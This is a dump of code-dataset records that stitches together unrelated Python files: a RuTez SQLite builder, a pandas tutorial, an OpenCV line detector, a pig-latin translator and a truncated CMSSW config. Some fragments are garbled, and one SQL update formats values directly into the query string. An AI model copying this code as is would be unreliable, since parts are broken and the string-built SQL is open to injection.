POST SEARCH TERM COMMANDS -=-=-\n\t\t\t\t\n\t\t# send the commands to the roku now...\n\t\tfor cmd in commands:\n\t\t\tself.queueDeviceCommand(cmd)\n","sub_path":"Roku Network Remote.indigoPlugin/Contents/Server Plugin/rokuNetworkRemoteDevice.py","file_name":"rokuNetworkRemoteDevice.py","file_ext":"py","file_size_in_byte":15070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"328011791","text":"# fonction pour voir quel est le plus grand entre l'energie limite et l'enerve potentiel\ndef ep (m,h,el,g=9.8):\n E=m*h*g\n if E\\s*'\n r'(.*)\\s*'\n r'(.*)\\s*'\n r'(.*)\\s*'\n r'(\\w*)\\s*'\n r'(.*)\\s*'\n)\nCONCEPTS_PATTERN = re.compile(\n r'\\s*'\n r'(.*)\\s*'\n r'(.*)\\s*'\n r'(.*)'\n)\n\n\nclass DBCreator:\n def __init__(self, new=False):\n with sqlite3.connect(config['database']) as self.conn:\n self.cursor = self.conn.cursor()\n # logger.info('Created db')\n # self.create_tables()\n # logger.info('Created tables')\n # self.load_concepts()\n # logger.info('Filled concepts')\n # self.load_synonyms()\n # logger.info('Filled synonyms')\n # self.load_entries()\n # logger.info('Filled entries')\n # self.load_relations()\n # logger.info('Filled relations')\n # self.load_close_words()\n # logger.info('Filled close words')\n self.add_normal_form()\n logger.info('Added normal form')\n\n def create_tables(self):\n self.cursor.execute(\"\"\"\n CREATE TABLE concepts(\n id INTEGER primary key,\n name TEXT not null,\n gloss TEXT,\n domain TEXT\n );\n \"\"\")\n self.cursor.execute(\"\"\"\n CREATE INDEX concept_names_idx ON concepts(name);\n \"\"\")\n self.cursor.execute(\"\"\"\n CREATE TABLE text_entry(\n entry_id INTEGER primary key,\n name TEXT,\n lemma TEXT,\n main_word TEXT,\n synt_type TEXT,\n pos_string TEXT,\n is_polysemic integer\n );\n \"\"\")\n self.cursor.execute(\"\"\"\n CREATE TABLE synonyms(\n concept_id INTEGER references concepts,\n entry_id INTEGER references text_entry (entry_id)\n );\n \"\"\")\n self.cursor.execute(\"\"\"\n CREATE TABLE relations(\n id_from INTEGER references concepts,\n id_to INTEGER references concepts,\n name TEXT,\n asp TEXT\n );\n \"\"\")\n\n @staticmethod\n def _file_window(file, num_lines):\n window = deque((file.readline() for _ in range(1, num_lines)), maxlen=num_lines)\n text = \"\".join(window)\n return text\n\n def load_concepts(self):\n with open(join(config['rutez_dir'], 'concepts.xml'), 'r', encoding=\"utf-8\") as concepts:\n for _ in concepts:\n line = self._file_window(concepts, 5)\n search_line = CONCEPTS_PATTERN.search(line)\n if search_line is None:\n continue\n self.cursor.execute(\"\"\"\n INSERT INTO concepts(id, name, gloss, domain) VALUES (?, ?, ?, ?)\n \"\"\", [search_line.group(1), search_line.group(2), search_line.group(3), search_line.group(4)])\n self.conn.commit()\n\n def load_relations(self):\n with open(join(config['rutez_dir'], 'relations.xml'), 'r', encoding=\"utf-8\") as relations:\n for line in relations:\n from_search = FROM_PATTERN.search(line) or None\n if from_search is None:\n continue\n from_search = from_search.group(1)\n to_search = TO_PATTERN.search(line).group(1)\n name_search = NAME_PATTERN.search(line).group(1)\n asp_search = ASP_PATTERN.search(line).group(1)\n if asp_search == ' ':\n asp_search = None\n self.cursor.execute(\"\"\"\n INSERT INTO relations(id_from, id_to, name, asp) \n VALUES (?, ?, ?, ?)\"\"\", [from_search, to_search, name_search, asp_search]\n )\n self.conn.commit()\n\n def load_synonyms(self):\n with open(join(config['rutez_dir'], 'synonyms.xml'), 'r', encoding=\"utf-8\") as synonyms:\n for line in synonyms:\n id_search = ID_PATTERN.search(line) or None\n entry_id_search = ENTRY_ID_PATTERN.search(line) or None\n if id_search is None or entry_id_search is None:\n continue\n id_search = id_search.group(1)\n entry_id_search = entry_id_search.group(1)\n self.cursor.execute(\"\"\"\n INSERT INTO synonyms(concept_id, entry_id)\n VALUES (?, ?)\"\"\", [id_search, entry_id_search]\n )\n self.conn.commit()\n\n def _delete_duplicates(self):\n self.cursor.execute(\"\"\"\n DELETE from close_words\n WHERE rowid not in(\n SELECT MIN(ROWID)\n FROM close_words\n GROUP BY id_from, entry_id, id_to\n );\n \"\"\")\n\n def _add_new_relation(self, order=2):\n self.cursor.execute(\"\"\"\n INSERT INTO close_words\n SELECT DISTINCT close_words.id_from, close_words.entry_id,\n relations.id_to, s1.entry_id, {0}\n FROM relations\n INNER JOIN close_words ON relations.id_from = close_words.id_to and close_words.relation_order = {1}\n INNER JOIN synonyms s1 on relations.id_to = s1.concept_id\n INNER JOIN text_entry t1 on s1.entry_id = t1.entry_id and t1.is_polysemic = 0\n WHERE close_words.id_from != relations.id_to\n \"\"\".format(order, order-1))\n\n def load_entries(self):\n with open(join(config['rutez_dir'], 'text_entry.xml'), 'r', encoding=\"utf-8\") as text_entry:\n for _ in text_entry:\n line = self._file_window(text_entry, 7)\n search_line = TEXT_ENTRY_PATTERN.search(line)\n if search_line is None:\n continue\n self.cursor.execute(\"\"\"\n INSERT INTO text_entry \n VALUES (?, ?, ?, ?, ?, ?, ?)\"\"\",\n [\n search_line.group(1),\n search_line.group(2),\n search_line.group(3),\n search_line.group(4),\n search_line.group(5),\n search_line.group(6),\n 0\n ]\n )\n self.conn.commit()\n self.cursor.execute(\"\"\"\n UPDATE text_entry SET is_polysemic = 1\n WHERE text_entry.entry_id in(\n SELECT entry_id as entry\n FROM synonyms\n GROUP BY entry\n HAVING COUNT(*) > 1\n )\n \"\"\")\n self.conn.commit()\n\n def load_close_words(self):\n self.cursor.execute(\"\"\"\n CREATE TABLE close_words(\n id_from integer, \n entry_id integer,\n id_to integer, \n entry_id_to integer, \n relation_order integer\n );\"\"\")\n\n self.cursor.execute(\"\"\"\n INSERT INTO close_words\n SELECT relations.id_from, s1.entry_id, relations.id_to, s2.entry_id, 1\n FROM relations\n INNER JOIN synonyms s1 ON relations.id_from = s1.concept_id\n INNER JOIN synonyms s2 on relations.id_to = s2.concept_id\n INNER JOIN text_entry t1 on s1.entry_id = t1.entry_id and t1.is_polysemic = 1\n INNER JOIN text_entry t2 on s2.entry_id = t2.entry_id and t2.is_polysemic = 0;\n \"\"\")\n logger.info('1st relation')\n\n self._add_new_relation(order=2)\n self._delete_duplicates()\n logger.info('2nd relation')\n\n self._add_new_relation(order=3)\n self._delete_duplicates()\n logger.info('3rd relation')\n\n self._add_new_relation(order=4)\n self._delete_duplicates()\n logger.info('4th relation')\n\n self.conn.commit()\n\n def add_normal_form(self):\n morph = pymorphy2.MorphAnalyzer()\n # self.cursor.execute(\"\"\"\n # ALTER TABLE text_entry\n # ADD normal_form TEXT;\n # \"\"\")\n self.conn.isolation_level = None\n self.cursor.execute(\"\"\"\n SELECT name\n FROM text_entry\n \"\"\")\n names = self.cursor.fetchall()\n result = {}\n for name in names:\n name = name[0]\n if name:\n words = name.split(' ')\n words = [morph.parse(word)[0].normal_form for word in words]\n result.update({name: ' '.join(words)})\n\n self.cursor.execute('begin')\n i = 0\n for key, value in tqdm(result.items()):\n self.cursor.execute(\"\"\"\n UPDATE text_entry \n SET normal_form = '{1}'\n WHERE name = '{0}';\n \"\"\".format(key.upper(), value.upper()))\n i += 1\n if not i % 1000:\n self.cursor.execute('commit')\n self.cursor.execute('begin')\n self.cursor.execute('commit')\n\n\ndef create_database():\n db = DBCreator()\n\n\nif __name__ == '__main__':\n create_database()\n","sub_path":"disambiguator/create_db.py","file_name":"create_db.py","file_ext":"py","file_size_in_byte":9940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"262857786","text":"#imports\n\nimport pandas as pd\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.metrics import mean_squared_error\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n'''\nPandas Basics: Reading File, Summarizing, Handling Missing Values, Filtering, Sorting\n'''\n\n#read in the CSV file\ndrinks = pd.read_csv('drinks.csv')\ntype(drinks)\n\n#examine the data\ndrinks\ndrinks.head()\ndrinks.describe()\n\n# find missing values in a DataFrame\ndrinks.isnull() # Dataframe of booleans\ndrinks.isnull().sum() # convert booleans to integers and add\n\n# handling missing values\ndrinks.dropna()\ndrinks.fillna(value = \"NA\")\ndrinks.fillna(value = \"NA\", inplace = True)\n\n# selecting a column 'series'\ndrinks['continent']\ndrinks.continent\ntype(drinks.continent)\n\n# summarizing a non-numeric column\ndrinks.continent.describe()\ndrinks.continent.value_counts()\n\n# Selecting multiple columns\ndrinks[['country', 'beer_servings']]\n\n# add a new column as a function of existing columns\ndrinks['total_servings'] = drinks.beer_servings + drinks.spirit_servings + drinks.wine_servings\ndrinks.head()\n\n# Logical filtering and sorting - see other code\n\n\n#bar plot of number of countries in each continent\ndrinks.continent.value_counts().plot(kind='bar', title='Countries per Continent')\nplt.xlabel('Continent')\nplt.ylabel('Count')\nplt.show()\n\n# features\nX = drinks[['beer_servings', 'spirit_servings']]\nX.shape\n\n# response\ny = drinks['wine_servings']\n\n\n# fit a linear model\nlm = LinearRegression()\nlm.fit(X,y)\n\n#examine the intercept and coefficients\nlm.intercept_\nlm.coef_\n\n# predict for all countries\npreds = lm.predict(X)\npreds\n\n# computer the MSE RMSE\nmean_squared_error(y, preds)\nnp.sqrt(mean_squared_error(y, preds))\n","sub_path":"ga_datascience.py","file_name":"ga_datascience.py","file_ext":"py","file_size_in_byte":1695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"484371440","text":"\"\"\"\nAuthor: Armand Vega\nDate: 10/11/2019\nNotes: passes 13/18 test cases on codesignal,\n probably needs rewriting for optimization and decreased execution time\n\"\"\"\ndef packetDescrambler(seq, fragmentData, n):\n #create empty dictionary\n packets = {}\n #create object to iterate through\n packet_zip = zip(seq, fragmentData)\n for key, val in packet_zip:\n if key in packets:\n packets[key] += val\n else:\n \tpackets.update({key: [val]})\n msg = ''\n\n for key, val in sorted(packets.items()):\n max_ = 0\n most = ''\n for value in val:\n if max_ < val.count(value):\n most = value\n max_ = val.count(value)\n if max_ * 2 >= n:\n msg += most\n lst = list(sorted(packets.keys()))\n start = lst[0]\n end = lst[-1]\n index = start + (end - start) // 2\n #nonsequential sequences\n if index > 1:\n msg = ''\n if len(msg) > 1 and msg[0] == \"#\":\n msg = ''\n if n != sum(packets.keys()) and sum(packets.keys()) != 0:\n if not len(msg) > n:\n msg = ''\n return msg\n","sub_path":"Company_Challenges/SpaceX/packetDescrambler.py","file_name":"packetDescrambler.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"253785876","text":"import packages.ipm_cloud_postgresql.model as model\nimport bth.interacao_cloud as interacao_cloud\nimport json\nimport logging\nfrom datetime import datetime\n\ntipo_registro = 'processos-cloud'\nsistema = 304\nlimite_lote = 1000\nurl = \"https://api.protocolo.betha.cloud/protocolo/service-layer/v1/api/processos\"\n\n\ndef iniciar_processo_busca(params_exec, ano, *args, **kwargs):\n print(\"EMPACOU DENTRO 0\")\n print('- Iniciando busca dos dados de dados.')\n lista_controle_migracao = []\n hoje = datetime.now().strftime(\"%Y-%m-%d\")\n contador = 0\n print(\"EMPACOU DENTRO 1\")\n req_res = interacao_cloud.busca_dados_cloud(params_exec,\n url=url,\n tipo_registro=tipo_registro,\n tamanho_lote=limite_lote)\n\n print(req_res)\n print(\"EMPACOU DENTRO 2\")\n for item in req_res:\n idGerado = item['id']\n chave_dsk1 = item['numeroProcesso']\n\n hash_chaves = model.gerar_hash_chaves(sistema, tipo_registro, str(chave_dsk1).replace(\"-\", \"/\"))\n # print(idGerado)\n lista_controle_migracao.append({\n 'sistema': sistema,\n 'tipo_registro': tipo_registro,\n 'hash_chave_dsk': hash_chaves,\n 'descricao_tipo_registro': 'Busca de processos no cloud',\n 'id_gerado': idGerado,\n 'i_chave_dsk1': chave_dsk1\n })\n contador += 1\n # print(lista_controle_migracao)\n model.insere_tabela_controle_migracao_auxiliar(params_exec, lista_req=lista_controle_migracao)\n print('- Busca de dados finalizado.')\n","sub_path":"packages/ipm_cloud_postgresql/protocolo/rotinas_envio/buscaProcessosNew.py","file_name":"buscaProcessosNew.py","file_ext":"py","file_size_in_byte":1674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"466462726","text":"import cv2\nimport numpy as np\n\nimg = cv2.imread('./imgs/CheeseBoard.jpg')\ncv2.imshow(\"Image\", img)\n\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\ncv2.imshow(\"Image - GreyScale\",gray)\ncv2.waitKey(0)\n\nedges = cv2.Canny(gray, 150, 250, apertureSize=3)\ncv2.imshow(\"edges - after canny\", edges)\ncv2.waitKey(0)\n\n\nlines = cv2.HoughLines(edges, 1, np.pi / 180, 200)\nfor rho, theta in lines[0]:\n a = np.cos(theta)\n b = np.sin(theta)\n x0 = a * rho\n y0 = b * rho\n x1 = int(x0 + 1000 * (-b)) \n y1 = int(y0 + 1000 * (a))\n x2 = int(x0 - 1000 * (-b))\n y2 = int(y0 - 1000 * (a))\n\n cv2.line(img, (x1, y1), (x2, y2), (0, 0, 255), 2)\n\ncv2.imshow(\"imgafter\", img)\ncv2.waitKey(0)\ncv2.imwrite('./imgs/CheeseBoard_Out.jpg', img)\n\n\n","sub_path":"Old/HoughLines.py","file_name":"HoughLines.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"481346024","text":"print(\"This code doesn't handle upper-case letters or punctuation.\")\nvowels = \"eaoui\"\nconsonants = \"bcdfghjklmnpqrstvwxyz\"\n\ndef get_consonant_prefix(word):\n consonants = \"bcdfghjklmnpqrstvwxyz\"\n i = 0\n consonant_prefix = \"\"\n while (consonants.find(word[i]) > -1):\n consonant_prefix += word[i]\n i += 1\n return consonant_prefix\n\ndef get_tail(word):\n consonants = \"bcdfghjklmnpqrstvwxyz\"\n i = 0\n consonant_prefix = \"\"\n while (consonants.find(word[i]) > -1):\n consonant_prefix += word[i]\n i += 1\n tail = word[i:]\n return tail\n\n#Enter a sentence here for it to be converted to pig-latin.\nprint('''\nit could be something like \"all this pig latin is making me hungry\"\n''')\nsentence = input(\"Give me a msg to translate: \")\npig_sentence = \"\"\nfor word in sentence.split(\" \"):\n if(vowels.find(word[0]) > -1):\n pig_sentence = pig_sentence + word + \"yay \"\n else:\n pig_sentence = pig_sentence + get_tail(word) + get_consonant_prefix(word) + \"ay \"\nprint(pig_sentence)","sub_path":"Piglatin_Translator.py","file_name":"Piglatin_Translator.py","file_ext":"py","file_size_in_byte":1033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"415626731","text":"# /user/cer/CMSSW_3_3_2/HLT_ppActivityTrig/V3 (CMSSW_3_3_2_HLT3)\n\nimport FWCore.ParameterSet.Config as cms\n\nprocess = cms.Process( \"HLT\" )\n\nprocess.HLTConfigVersion = cms.PSet(\n tableName = cms.string('/user/cer/CMSSW_3_3_2/HLT_ppActivityTrig/V3')\n)\n\nprocess.options = cms.untracked.PSet( Rethrow = cms.untracked.vstring( 'ProductNotFound',\n 'TooManyProducts',\n 'TooFewProducts' ) )\n\nprocess.source = cms.Source( \"PoolSource\",\n fileNames = cms.untracked.vstring( '/store/relval/CMSSW_3_3_0/RelValHydjetQ_MinBias_4TeV/GEN-SIM-RAW/MC_31X_V9-v2/0003/E0C659F9-49BD-DE11-BD8B-001731AF68B3.root' )\n)\n\nprocess.essourceSev = cms.ESSource( \"EmptyESSource\",\n recordName = cms.string( \"HcalSeverityLevelComputerRcd\" ),\n iovIsRunNotTime = cms.bool( True ),\n appendToDataLabel = cms.string( \"\" ),\n firstValid = cms.vuint32( 1 )\n)\nprocess.BTagRecord = cms.ESSource( \"EmptyESSource\",\n recordName = cms.string( \"JetTagComputerRecord\" ),\n iovIsRunNotTime = cms.bool( True ),\n appendToDataLabel = cms.string( \"\" ),\n firstValid = cms.vuint32( 1 )\n)\nprocess.GlobalTag = cms.ESSource( \"PoolDBESSource\",\n BlobStreamerName = cms.untracked.string( \"TBufferBlobStreamingService\" ),\n connect = cms.string( \"frontier://(proxyurl=http://localhost:3128)(serverurl=http://localhost:8000/FrontierOnProd)(serverurl=http://localhost:8000/FrontierOnProd)(retrieve-ziplevel=0)/CMS_COND_31X_GLOBALTAG\" ),\n globaltag = cms.string( \"GR09_H_V3::All\" ),\n appendToDataLabel = cms.string( \"\" ),\n DBParameters = cms.PSet( \n authenticationPath = cms.untracked.string( \".\" ),\n messageLevel = cms.untracked.int32( 0 ),\n connectionTimeOut = cms.untracked.int32( 0 ),\n connectionRetrialPeriod = cms.untracked.int32( 10 ),\n connectionRetrialTimeOut = cms.untracked.int32( 60 ),\n enableConnectionSharing = cms.untracked.bool( True ),\n enableReadOnlySessionOnUpdateConnection = cms.untracked.bool( False ),\n enablePoolAutomaticCleanUp = cms.untracked.bool( False ),\n idleConnectionCleanupPeriod = cms.untracked.int32( 10 )\n ),\n toGet = cms.VPSet( \n ),\n timetype = cms.string( \"runnumber\" )\n)\nprocess.HepPDTESSource = cms.ESSource( \"HepPDTESSource\",\n pdtFileName = cms.FileInPath( \"SimGeneral/HepPDTESSource/data/pythiaparticle.tbl\" ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.L2RelativeCorrectionService = cms.ESSource( \"L2RelativeCorrectionService\",\n appendToDataLabel = cms.string( \"\" ),\n tagName = cms.string( \"Summer08_L2Relative_IC5Calo\" ),\n label = cms.string( \"L2RelativeJetCorrector\" )\n)\nprocess.MCJetCorrectorIcone5HF07 = cms.ESSource( \"L2RelativeCorrectionService\",\n appendToDataLabel = cms.string( \"\" ),\n tagName = cms.string( \"HLT_L2Relative\" ),\n label = cms.string( \"MCJetCorrectorIcone5HF07\" )\n)\nprocess.MCJetCorrectorIcone5Unit = cms.ESSource( \"L2RelativeCorrectionService\",\n appendToDataLabel = cms.string( \"\" ),\n tagName = cms.string( \"HLT_L2RelativeFlat\" ),\n label = cms.string( \"MCJetCorrectorIcone5Unit\" )\n)\nprocess.L3AbsoluteCorrectionService = cms.ESSource( \"L3AbsoluteCorrectionService\",\n appendToDataLabel = cms.string( \"\" ),\n tagName = cms.string( \"Summer08_L3Absolute_IC5Calo\" ),\n label = cms.string( \"L3AbsoluteJetCorrector\" )\n)\nprocess.MCJetCorrectorIcone5 = cms.ESSource( \"JetCorrectionServiceChain\",\n label = cms.string( \"MCJetCorrectorIcone5\" ),\n appendToDataLabel = cms.string( \"\" ),\n correctors = cms.vstring( 'L2RelativeJetCorrector',\n 'L3AbsoluteJetCorrector' )\n)\nprocess.SiStripQualityFakeESSource = cms.ESSource( \"SiStripQualityFakeESSource\" )\nprocess.XMLIdealGeometryESSource = cms.ESSource( \"XMLIdealGeometryESSource\",\n rootNodeName = cms.string( \"cms:OCMS\" ),\n appendToDataLabel = cms.string( \"\" ),\n geomXMLFiles = ( cms.vstring( 'Geometry/CMSCommonData/data/materials.xml',\n 'Geometry/CMSCommonData/data/rotations.xml',\n 'Geometry/CMSCommonData/data/extend/cmsextent.xml',\n 'Geometry/CMSCommonData/data/cms.xml',\n 'Geometry/CMSCommonData/data/cmsMother.xml',\n 'Geometry/CMSCommonData/data/cmsTracker.xml',\n 'Geometry/CMSCommonData/data/caloBase.xml',\n 'Geometry/CMSCommonData/data/cmsCalo.xml',\n 'Geometry/CMSCommonData/data/muonBase.xml',\n 'Geometry/CMSCommonData/data/cmsMuon.xml',\n 'Geometry/CMSCommonData/data/mgnt.xml',\n 'Geometry/CMSCommonData/data/beampipe.xml',\n 'Geometry/CMSCommonData/data/cmsBeam.xml',\n 'Geometry/CMSCommonData/data/muonMB.xml',\n 'Geometry/CMSCommonData/data/muonMagnet.xml',\n 'Geometry/CMSCommonData/data/cavern.xml',\n 'Geometry/TrackerCommonData/data/pixfwdMaterials.xml',\n 'Geometry/TrackerCommonData/data/pixfwdCommon.xml',\n 'Geometry/TrackerCommonData/data/pixfwdPlaq.xml',\n 'Geometry/TrackerCommonData/data/pixfwdPlaq1x2.xml',\n 'Geometry/TrackerCommonData/data/pixfwdPlaq1x5.xml',\n 'Geometry/TrackerCommonData/data/pixfwdPlaq2x3.xml',\n 'Geometry/TrackerCommonData/data/pixfwdPlaq2x4.xml',\n 'Geometry/TrackerCommonData/data/pixfwdPlaq2x5.xml',\n 'Geometry/TrackerCommonData/data/pixfwdPanelBase.xml',\n 'Geometry/TrackerCommonData/data/pixfwdPanel.xml',\n 'Geometry/TrackerCommonData/data/pixfwdBlade.xml',\n 'Geometry/TrackerCommonData/data/pixfwdNipple.xml',\n 'Geometry/TrackerCommonData/data/pixfwdDisk.xml',\n 'Geometry/TrackerCommonData/data/pixfwdCylinder.xml',\n 'Geometry/TrackerCommonData/data/pixfwd.xml',\n 'Geometry/TrackerCommonData/data/pixbarmaterial.xml',\n 'Geometry/TrackerCommonData/data/pixbarladder.xml',\n 'Geometry/TrackerCommonData/data/pixbarladderfull.xml',\n 'Geometry/TrackerCommonData/data/pixbarladderhalf.xml',\n 'Geometry/TrackerCommonData/data/pixbarlayer.xml',\n 'Geometry/TrackerCommonData/data/pixbarlayer0.xml',\n 'Geometry/TrackerCommonData/data/pixbarlayer1.xml',\n 'Geometry/TrackerCommonData/data/pixbarlayer2.xml',\n 'Geometry/TrackerCommonData/data/pixbar.xml',\n 'Geometry/TrackerCommonData/data/tibtidcommonmaterial.xml',\n 'Geometry/TrackerCommonData/data/tibmaterial.xml',\n 'Geometry/TrackerCommonData/data/tibmodpar.xml',\n 'Geometry/TrackerCommonData/data/tibmodule0.xml',\n 'Geometry/TrackerCommonData/data/tibmodule0a.xml',\n 'Geometry/TrackerCommonData/data/tibmodule0b.xml',\n 'Geometry/TrackerCommonData/data/tibmodule2.xml',\n 'Geometry/TrackerCommonData/data/tibstringpar.xml',\n 'Geometry/TrackerCommonData/data/tibstring0ll.xml',\n 'Geometry/TrackerCommonData/data/tibstring0lr.xml',\n 'Geometry/TrackerCommonData/data/tibstring0ul.xml',\n 'Geometry/TrackerCommonData/data/tibstring0ur.xml',\n 'Geometry/TrackerCommonData/data/tibstring0.xml',\n 'Geometry/TrackerCommonData/data/tibstring1ll.xml',\n 'Geometry/TrackerCommonData/data/tibstring1lr.xml',\n 'Geometry/TrackerCommonData/data/tibstring1ul.xml',\n 'Geometry/TrackerCommonData/data/tibstring1ur.xml',\n 'Geometry/TrackerCommonData/data/tibstring1.xml',\n 'Geometry/TrackerCommonData/data/tibstring2ll.xml',\n 'Geometry/TrackerCommonData/data/tibstring2lr.xml',\n 'Geometry/TrackerCommonData/data/tibstring2ul.xml',\n 'Geometry/TrackerCommonData/data/tibstring2ur.xml',\n 'Geometry/TrackerCommonData/data/tibstring2.xml',\n 'Geometry/TrackerCommonData/data/tibstring3ll.xml',\n 'Geometry/TrackerCommonData/data/tibstring3lr.xml',\n 'Geometry/TrackerCommonData/data/tibstring3ul.xml',\n 'Geometry/TrackerCommonData/data/tibstring3ur.xml',\n 'Geometry/TrackerCommonData/data/tibstring3.xml',\n 'Geometry/TrackerCommonData/data/tiblayerpar.xml',\n 'Geometry/TrackerCommonData/data/tiblayer0.xml',\n 'Geometry/TrackerCommonData/data/tiblayer1.xml',\n 'Geometry/TrackerCommonData/data/tiblayer2.xml',\n 'Geometry/TrackerCommonData/data/tiblayer3.xml',\n 'Geometry/TrackerCommonData/data/tib.xml',\n 'Geometry/TrackerCommonData/data/tidmaterial.xml',\n 'Geometry/TrackerCommonData/data/tidmodpar.xml',\n 'Geometry/TrackerCommonData/data/tidmodule0.xml',\n 'Geometry/TrackerCommonData/data/tidmodule0r.xml',\n 'Geometry/TrackerCommonData/data/tidmodule0l.xml',\n 'Geometry/TrackerCommonData/data/tidmodule1.xml',\n 'Geometry/TrackerCommonData/data/tidmodule1r.xml',\n 'Geometry/TrackerCommonData/data/tidmodule1l.xml',\n 'Geometry/TrackerCommonData/data/tidmodule2.xml',\n 'Geometry/TrackerCommonData/data/tidringpar.xml',\n 'Geometry/TrackerCommonData/data/tidring0.xml',\n 'Geometry/TrackerCommonData/data/tidring0f.xml',\n 'Geometry/TrackerCommonData/data/tidring0b.xml',\n 'Geometry/TrackerCommonData/data/tidring1.xml',\n 'Geometry/TrackerCommonData/data/tidring1f.xml',\n 'Geometry/TrackerCommonData/data/tidring1b.xml',\n 'Geometry/TrackerCommonData/data/tidring2.xml',\n 'Geometry/TrackerCommonData/data/tid.xml',\n 'Geometry/TrackerCommonData/data/tidf.xml',\n 'Geometry/TrackerCommonData/data/tidb.xml',\n 'Geometry/TrackerCommonData/data/tibtidservices.xml',\n 'Geometry/TrackerCommonData/data/tibtidservicesf.xml',\n 'Geometry/TrackerCommonData/data/tibtidservicesb.xml',\n 'Geometry/TrackerCommonData/data/tobmaterial.xml',\n 'Geometry/TrackerCommonData/data/tobmodpar.xml',\n 'Geometry/TrackerCommonData/data/tobmodule0.xml',\n 'Geometry/TrackerCommonData/data/tobmodule2.xml',\n 'Geometry/TrackerCommonData/data/tobmodule4.xml',\n 'Geometry/TrackerCommonData/data/tobrodpar.xml',\n 'Geometry/TrackerCommonData/data/tobrod0c.xml',\n 'Geometry/TrackerCommonData/data/tobrod0l.xml',\n 'Geometry/TrackerCommonData/data/tobrod0h.xml',\n 'Geometry/TrackerCommonData/data/tobrod0.xml',\n 'Geometry/TrackerCommonData/data/tobrod1l.xml',\n 'Geometry/TrackerCommonData/data/tobrod1h.xml',\n 'Geometry/TrackerCommonData/data/tobrod1.xml',\n 'Geometry/TrackerCommonData/data/tobrod2c.xml',\n 'Geometry/TrackerCommonData/data/tobrod2l.xml',\n 'Geometry/TrackerCommonData/data/tobrod2h.xml',\n 'Geometry/TrackerCommonData/data/tobrod2.xml',\n 'Geometry/TrackerCommonData/data/tobrod3l.xml',\n 'Geometry/TrackerCommonData/data/tobrod3h.xml',\n 'Geometry/TrackerCommonData/data/tobrod3.xml',\n 'Geometry/TrackerCommonData/data/tobrod4c.xml',\n 'Geometry/TrackerCommonData/data/tobrod4l.xml',\n 'Geometry/TrackerCommonData/data/tobrod4h.xml',\n 'Geometry/TrackerCommonData/data/tobrod4.xml',\n 'Geometry/TrackerCommonData/data/tobrod5l.xml',\n 'Geometry/TrackerCommonData/data/tobrod5h.xml',\n 'Geometry/TrackerCommonData/data/tobrod5.xml',\n 'Geometry/TrackerCommonData/data/tob.xml',\n 'Geometry/TrackerCommonData/data/tecmaterial.xml',\n 'Geometry/TrackerCommonData/data/tecmodpar.xml',\n 'Geometry/TrackerCommonData/data/tecmodule0.xml',\n 'Geometry/TrackerCommonData/data/tecmodule0r.xml',\n 'Geometry/TrackerCommonData/data/tecmodule0s.xml',\n 'Geometry/TrackerCommonData/data/tecmodule1.xml',\n 'Geometry/TrackerCommonData/data/tecmodule1r.xml',\n 'Geometry/TrackerCommonData/data/tecmodule1s.xml',\n 'Geometry/TrackerCommonData/data/tecmodule2.xml',\n 'Geometry/TrackerCommonData/data/tecmodule3.xml',\n 'Geometry/TrackerCommonData/data/tecmodule4.xml',\n 'Geometry/TrackerCommonData/data/tecmodule4r.xml',\n 'Geometry/TrackerCommonData/data/tecmodule4s.xml',\n 'Geometry/TrackerCommonData/data/tecmodule5.xml',\n 'Geometry/TrackerCommonData/data/tecmodule6.xml',\n 'Geometry/TrackerCommonData/data/tecpetpar.xml',\n 'Geometry/TrackerCommonData/data/tecring0.xml',\n 'Geometry/TrackerCommonData/data/tecring1.xml',\n 'Geometry/TrackerCommonData/data/tecring2.xml',\n 'Geometry/TrackerCommonData/data/tecring3.xml',\n 'Geometry/TrackerCommonData/data/tecring4.xml',\n 'Geometry/TrackerCommonData/data/tecring5.xml',\n 'Geometry/TrackerCommonData/data/tecring6.xml',\n 'Geometry/TrackerCommonData/data/tecring0f.xml',\n 'Geometry/TrackerCommonData/data/tecring1f.xml',\n 'Geometry/TrackerCommonData/data/tecring2f.xml',\n 'Geometry/TrackerCommonData/data/tecring3f.xml',\n 'Geometry/TrackerCommonData/data/tecring4f.xml',\n 'Geometry/TrackerCommonData/data/tecring5f.xml',\n 'Geometry/TrackerCommonData/data/tecring6f.xml',\n 'Geometry/TrackerCommonData/data/tecring0b.xml',\n 'Geometry/TrackerCommonData/data/tecring1b.xml',\n 'Geometry/TrackerCommonData/data/tecring2b.xml',\n 'Geometry/TrackerCommonData/data/tecring3b.xml',\n 'Geometry/TrackerCommonData/data/tecring4b.xml',\n 'Geometry/TrackerCommonData/data/tecring5b.xml',\n 'Geometry/TrackerCommonData/data/tecring6b.xml',\n 'Geometry/TrackerCommonData/data/tecpetalf.xml',\n 'Geometry/TrackerCommonData/data/tecpetalb.xml',\n 'Geometry/TrackerCommonData/data/tecpetal0.xml',\n 'Geometry/TrackerCommonData/data/tecpetal0f.xml',\n 'Geometry/TrackerCommonData/data/tecpetal0b.xml',\n 'Geometry/TrackerCommonData/data/tecpetal3.xml',\n 'Geometry/TrackerCommonData/data/tecpetal3f.xml',\n 'Geometry/TrackerCommonData/data/tecpetal3b.xml',\n 'Geometry/TrackerCommonData/data/tecpetal6f.xml',\n 'Geometry/TrackerCommonData/data/tecpetal6b.xml',\n 'Geometry/TrackerCommonData/data/tecpetal8f.xml',\n 'Geometry/TrackerCommonData/data/tecpetal8b.xml',\n 'Geometry/TrackerCommonData/data/tecwheel.xml',\n 'Geometry/TrackerCommonData/data/tecwheela.xml',\n 'Geometry/TrackerCommonData/data/tecwheelb.xml',\n 'Geometry/TrackerCommonData/data/tecwheelc.xml',\n 'Geometry/TrackerCommonData/data/tecwheeld.xml',\n 